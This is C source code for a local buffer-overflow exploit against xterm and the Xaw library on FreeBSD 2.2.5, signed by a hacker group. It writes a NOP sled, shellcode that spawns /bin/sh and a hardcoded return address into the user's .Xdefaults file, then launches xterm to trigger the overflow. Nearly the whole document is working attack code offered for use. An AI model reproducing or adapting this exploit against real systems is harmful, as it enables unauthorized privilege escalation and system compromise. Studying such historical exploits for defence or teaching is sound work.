/* Ones more xterm, Xaw sploit by Kil3r of Lam3rZ. This one is for FreeBSD 2.2.5 Have a fun! Greetz: Bulba, Many, other Lam3rZ members and all Polish HackerZ! Based on 3xterm for Linux; FreeBSD shellcode taken from Xt library bug xterm exploit by Aleph1 */ #include #include #include #define CONFFILE ".Xdefaults" #define OLDFILE ".Xdefaults.old" #define NEWFILE ".Xdefaults.new" #define OFFSET 0xefbfcc2c // address on stack with shellcode // try to decrease it if any problems... int *ptr; char *cptr; long get_esp(void) { __asm__("movl %esp,%eax\n"); } void main(int argc, char *argv[]) { char *home; FILE *f_in, *f_out; char buff[16384]; char shellbuf[16384]; char *s; int i; char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; if (home = getenv("HOME")) chdir(home); if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); } if (f_in = fopen(CONFFILE, "r")) { fseek(f_in,0,SEEK_SET); while (!feof(f_in)) { fgets(buff,16384,f_in); for (s=buff;isblank(*s);s++); if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buff,f_out); } fclose(f_in); } /* fill the buffer with nops */ memset(shellbuf, 0x90, sizeof(shellbuf)); shellbuf[sizeof(shellbuf)-1] = 0; ptr = (int *)(shellbuf+1028); *ptr++ =OFFSET -2; *ptr++ =0x00; cptr = (char *)(shellbuf+900); for(i=0;i < strlen(execshell);i++) *(cptr++) = execshell[i]; fputs("xterm*inputMethod:",f_out); fputs(shellbuf, f_out); fclose(f_out); system("/bin/cp "CONFFILE" "OLDFILE); system("/bin/mv -f "NEWFILE" "CONFFILE); execl("/usr/X11R6/bin/xterm","xterm",NULL); }